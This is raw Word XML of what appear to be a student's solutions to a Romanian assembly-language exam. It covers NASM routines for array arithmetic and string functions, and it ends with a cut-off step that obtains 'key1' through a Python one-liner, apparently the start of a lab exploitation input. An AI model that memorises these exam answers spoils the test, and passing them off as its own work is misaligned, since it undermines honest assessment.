          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140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F140F2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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F140F2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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F140F2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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CB8661" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00F140F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8EF1700" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00F140F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140F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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140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F140F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main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140F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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775213B8" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00F140F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140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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CB66F1" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00F140F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140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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140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// TODO c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7038F102" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00F140F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140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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140F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starship</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140F2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"into the darkness"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140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F140F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-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140F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0x54524542</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F140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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5382C22D" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00F140F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140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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140F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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F140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gramStart"/>
      <w:r w:rsidRPr="00F140F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  <w:r w:rsidRPr="00F140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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A601A47" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00F140F2" w:rsidRDefault="00E73B75" w:rsidP="00E73B7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F140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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DCFF25" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="6E311451" w14:textId="757785DC" w:rsidR="00E73B75" w:rsidRDefault="00033D55" w:rsidP="00E73B75">
      <w:pPr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</w:rPr>
        <w:t>VARIANTA CC SUBIECTE IN COMENTARII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49453374" w14:textId="77777777" w:rsidR="00033D55" w:rsidRDefault="00033D55" w:rsidP="00033D55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00340848">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED3B6B0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%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include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F0963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"printf32.asm"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B147E11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C351D07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extern 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1CA780FE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10C5608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section .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F0963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bss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="314D4EDE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answer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resw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7DD76BF1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C54FFD3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section .data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E7247B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N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dd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11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F72EE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poster_arr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0x149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0x2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0x77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0x3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0x1DC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0x18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0x4D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0x1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0x21A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0x3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0xB9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F98CBD6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poster_len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equ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$ - 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poster_arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43D08D22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2C33AA0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section .text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACEDD6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global main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332CD8D3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A86E553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lastRenderedPageBreak/>
        <w:t>main:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041896B8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3E5AC418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3B21AFD9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663FD96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a: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Calculați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numărul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biți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1 ai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elementului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la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mijlocul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15043099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vectorului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poster_arr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5CC90D89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Salvați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rezultatul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în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answer (un word).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28192433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[N]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E93CA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shr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63C88F5C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nr bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2030BA9A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movzx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poster_arr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08737B4B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loop_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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514D9B73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29517541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end_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="350BF65C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6F706A8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6DC72FB3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and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0D7DC99C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2DAC2896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is_bit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="409DBDD6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E888F2F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57E9F31C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shr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45206EE2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loop_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="084ABBA8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is_bit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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360DD08F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4B06BE16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5CB73E69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shr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7CE23BF9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loop_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E23CD00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end_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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0E7C3120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[answer],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cx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D754DF9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83D2FE3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</w:p>
    <w:p w14:paraId="4E62D68E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Afișare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rezultat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subpunctul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a). Nu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modificați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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CDDD2D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PRINTF32 `%d\n\x0`,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[answer]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AAEE26" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="009F0963" w:rsidRDefault="00033D55" w:rsidP="00033D5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C7F09BD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b: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Identificați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elementul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minim din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vectorul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poster_arr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50A55AA5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Salvați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rezultatul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în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answer (un word).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7293549D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192201B9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movzx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poster_arr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48A8E542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loop_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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126FE0A8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[N]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690A520A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end_loop_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BFA2EA3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7DBF75C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movzx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poster_arr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2CAD5D97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11EC232E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jg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schimbare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B0E4D77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next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE9915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schimbare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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5103A613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140712E1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next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6BEB65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next:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D328198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55A28074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loop_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5626D2FB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end_loop_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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2A78D627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8BC7061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[answer],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bx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70302DC0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Afișare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rezultat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subpunctul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b). Nu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modificați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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035809FA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PRINTF32 `%d\n\x0`,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[answer]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63836C99" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="009F0963" w:rsidRDefault="00033D55" w:rsidP="00033D5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3EA0CF0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c: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Calculați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restul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împărțirii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sumei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elementelor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vectorului</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04FF277C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poster_arr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la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numărul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1337.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A80C9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Plasați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rezultatul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în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answer (un word).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014B7677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contor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="470C65BB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suma</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41A7A11C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loop_sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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56DC7CDF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[N]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF5EB6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end_loop_sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59D154F1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EB47FCF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bx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poster_arr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7D98155E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E78A9F0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061C4085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loop_sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04E3EA1D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end_loop_sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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36990C10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28709E20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036F0313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54D5B463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576148E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MERGEA FACUT CU AND DACA NR CU CARE IMPARTIM ESTE PUTERE A LUI 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF5637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1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B5287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div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6CB9B0A6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[answer],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dx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EAX = CATUL, EDX = RESTUL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABAC592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A3A2FDB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Afișare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rezultat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subpunctul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c). Nu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modificați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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054AB8C8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PRINTF32 `%d\n\x0`,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[answer]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9F8A6E" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="009F0963" w:rsidRDefault="00033D55" w:rsidP="00033D5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98E5328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d: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Calculați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produsul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elementelor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vectorului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poster_arr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pe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poziții</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14192463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impare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2395B14C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Primul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element se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află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la index 0,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produsul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încape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garantat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pe 16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biți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40BF8774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Plasați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răspunsul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în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answer (un word).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBC34A0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53B9C8A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contor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AF13FBC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produs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5426F4D3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758B2135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loop_product</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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7585F74B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[N]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6D00FE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jge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end_loop_product</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03CBD6C9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DFB8D93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76730ED9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movzx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poster_arr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370DA1DB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mul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21070E53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26BD4FBC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7A8A102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</w:p>
    <w:p w14:paraId="2B35AF08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loop_product</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45888F90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end_loop_product</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F096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22F84FFF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[answer], </w:t>
      </w:r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bx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</w:p>
    <w:p w14:paraId="2B21A475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Afișare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rezultat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subpunctul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d). Nu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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modificați</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AEE688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PRINTF32 `%d\n\x0`,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[answer]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CEDAEF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EB1A90A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Return 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AEB089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F096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58B751AF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0BC57F38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F096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F096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32AE3640" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="009F0963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06403D9" w14:textId="77777777" w:rsidR="00033D55" w:rsidRDefault="00033D55" w:rsidP="00033D55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F48A6C" w14:textId="77777777" w:rsidR="00033D55" w:rsidRDefault="00033D55" w:rsidP="00033D55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F5554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extern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strlen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="792980B5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extern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483B9012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extern malloc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3012E72B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extern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getchar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="603B3449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extern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calloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A51C24A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D976EB2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section .data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057E6607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D1CD955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n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dd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99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CA73F6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FCF754B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str1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db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'Would somebody get this big walking carpet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out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of my way?',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24D37851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str_fmt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db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'%s',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10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5FBB8C7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int_fmt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db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'%d',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10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3909D282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newline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db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10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48DD8E0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69F9E34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N </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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equ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100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6485190A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section .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097491D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bss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="611E810D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A49C98E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str2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resb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N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC633C4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DBC9E3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section .text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780FD1FE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global main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F7E7E6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E88284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b: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Implementati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void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foo_gets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(char *str, int size) cu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urmatorul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comportament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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F6305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    -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citeste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cel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mult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`size-1`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caractere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la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intrarea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standard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le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stocheaza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in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memorie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A06AEA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      la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adresa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`str`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D661B0B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    -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citirea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se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opreste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la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intalnirea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EndOfFile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sau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la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intalnirea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caracterului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`newline`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51287CEA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    -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terminatorul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sir `0` se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stoca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dupa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ultimul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caracter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din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sirul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`str`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194D0A08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    -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folositi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cu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antetul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in C `int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getchar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()`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citi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un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caracter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la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intrarea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standard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B869366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        -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getchar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()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intoarce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urmatorul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caracter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din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intrarea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standard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conertit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la int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D17643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        -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getchar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()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intoarce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0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atunci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cand se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ajunge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la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EndOfFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62B2C9B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        -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getchar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()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intoarce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10 (decimal)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atunci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cand se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citeste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caracterul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`newline`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF28351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ATENTIE: nu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aveti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voie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 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folositi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apelul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fgets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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A4BFF3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C649B2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foo_gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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6AA01043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199CBB13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2CC18E7C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88408E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1C578328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644F5033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1C496FB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loop_read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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7DE10EF2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3E074C1B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38FF7AC1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getchar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C151AE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10B4D846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4D9A131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al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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C098B46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final_read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0530D84C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al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3DE6833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final_read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F45E519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</w:p>
    <w:p w14:paraId="4772C86C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al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197FB6F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</w:p>
    <w:p w14:paraId="539C0D5B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24B94928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12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733848FD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jl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loop_read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5154FA5C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</w:p>
    <w:p w14:paraId="44157D5A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776CF0C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final_read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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73F1C1AB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1C9FB3C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5C1DB4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6904F1ED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7DC1FC77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5FF6C9A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;TODO c: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Implementati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`int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find_last_pos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(char *str, char c)` care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intoarce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02F5FDBB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   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indexul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ultimei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aparitii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caracterului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primit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in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argumentul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`c` din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sirul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3213A1BC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    de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caractere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primit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in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argumentul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`str`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363088FC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   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intoarce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-1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daca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`c` nu se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gaseste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in `str`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F03F44C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5C0161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find_last_pos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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451D8FA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1A1E000C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0BF48D2D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FD8AF65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76CD8A6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4644AED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strlen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53F5863D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</w:p>
    <w:p w14:paraId="0D2BBB37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1B9D36B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30F090AE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dec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17EB30C4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-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34BA829B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12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72313F02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64B3399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loop_find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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6E0768CB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2D4C2963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al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5DDC7555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al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dl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</w:p>
    <w:p w14:paraId="6D8E2AD2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modific_edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="020DBE8B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dec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64537E89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722A35C5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jge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loop_find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="585DBBE7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final_find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EFE7825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353D426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modific_edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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61FE6BD4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787B7C6E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4616EB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final_find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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18E030FA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6BC3B4E5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4DFF995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61ABA5CE" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="0097491D" w:rsidRDefault="00033D55" w:rsidP="00033D5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104B6F1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d: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Implementati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`int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count_apps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(char *str, char c, int l, int r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEAECA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    care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numara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cate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ori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apare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caracterul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dat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argumentul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`c` in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sirul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`str`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B84B55A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   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intre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pozitiile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`l`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`r` (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inclusiv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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E2806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    Este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garantat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ca 0 &lt;= l &lt;= r &lt;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strlen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(str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC217FD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71F2C63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count_apps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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41F6A5E2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2E46B9BA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6A4FDA4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474C69C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16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5EF3FDBA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5159A51B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71FE328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1D5A7A62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315B707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loop_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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631B4E93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29A23EBC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bl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504D8A43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9BE0F9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bl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12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1B6A1417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maresc_edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F917B37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continui_d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B30C40D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8DDDCB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maresc_edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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326A63CE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36839633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125FD7D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continui_d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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597A91E1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4E3B4D1D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20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540A2C59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jle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loop_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="255431DE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</w:p>
    <w:p w14:paraId="2A09DBD4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5743271C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464047D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2B1202AA" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="0097491D" w:rsidRDefault="00033D55" w:rsidP="00033D5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CFD06A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main:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F42448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4E20B73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5822C49A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8DD242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;TODO a;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Afisati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la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iesirea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standard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sirul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input_str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` precum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lungimea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acestuia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.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Fiecare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afisare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se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face pe o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linie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noua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66C1E98D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Folositi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biblioteca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strlen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`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determina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lungimea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unui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sir de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caractere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3829B531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Folositi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printf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`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afisare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3318F304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F2FAE9A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str1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A3518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str_fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10E3A9D2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08F6977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771C555D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503BB09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str1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2B11A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strlen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E4FFA4B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</w:p>
    <w:p w14:paraId="6D4200E9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829D98B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188B5662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int_fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="347D9983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5176FB0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5C88029E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8D95C82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 TODO b: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Apelati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foo_gets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`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citi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la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intrarea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standard un sir de maxim `N-1`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BEE3C1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       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caractere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pe care-l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veti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stoca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la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adresa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`str2`.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Afisati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apoi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`str2`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37345EF8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F2C33AC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N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC736B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str2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E89B25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foo_gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="738A7FA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234F11CA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B6A452E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str2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ECC48A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str_fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="643C98E7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03C2CDA8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6358638C" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="0097491D" w:rsidRDefault="00033D55" w:rsidP="00033D5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0EFD091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c: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find_last_pos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`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este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deja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apelata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mai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jos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B213B4C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Afisati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rezultatul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folosind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biblioteca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printf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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC864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0E96B46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'o'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C54FD1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str1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D93FAA4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find_last_pos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="210326D8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10F5E7F7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4D0AAC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14334E3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int_fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F4B3107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52A485C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0CABF709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C30D768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'o'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C48108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str2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6596D7FC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find_last_pos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66E8D4B5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0D350EC1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783C446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250D9A2E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int_fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15E0AE01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6780274A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3A70344D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D932F75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</w:p>
    <w:p w14:paraId="12909245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55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4810CC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</w:p>
    <w:p w14:paraId="1AB930A3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'o'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8B9E7A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str1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B902E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count_apps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DE6F0BA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16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FADFC5E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0B7807B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7AC8E2D2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int_fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07B280F6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660A1BC8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2CD8AD43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F7BA282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print result here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15160D6D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A0DCAEB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37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E555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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628BC3E3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'o'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6D5E6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str2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A8AAC1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count_apps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61AB6B8E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16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0849FE55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9AEB65B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5E9692BB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int_fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5187E953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660EE36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6435CBFD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EDF9B3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print result here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6353C721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00B37F3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print result here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E1B86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022D100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;TODO d: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count_apps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`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este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deja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apelata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mai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jos.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12B8C75E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Afisati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rezultatul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folosind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biblitoca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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097491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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C516DF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97491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050B4BEC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1D6C4739" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="0097491D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</w:pPr>
      <w:r w:rsidRPr="0097491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97491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5DF508CE" w14:textId="77777777" w:rsidR="00033D55" w:rsidRDefault="00033D55" w:rsidP="00033D55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3624"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5FC265" w14:textId="77777777" w:rsidR="00033D55" w:rsidRDefault="00033D55" w:rsidP="00033D55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3624"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">a.  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>obtinem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> key1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B16453" w14:textId="77777777" w:rsidR="00033D55" w:rsidRDefault="00033D55" w:rsidP="00033D55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3624"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import sys; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
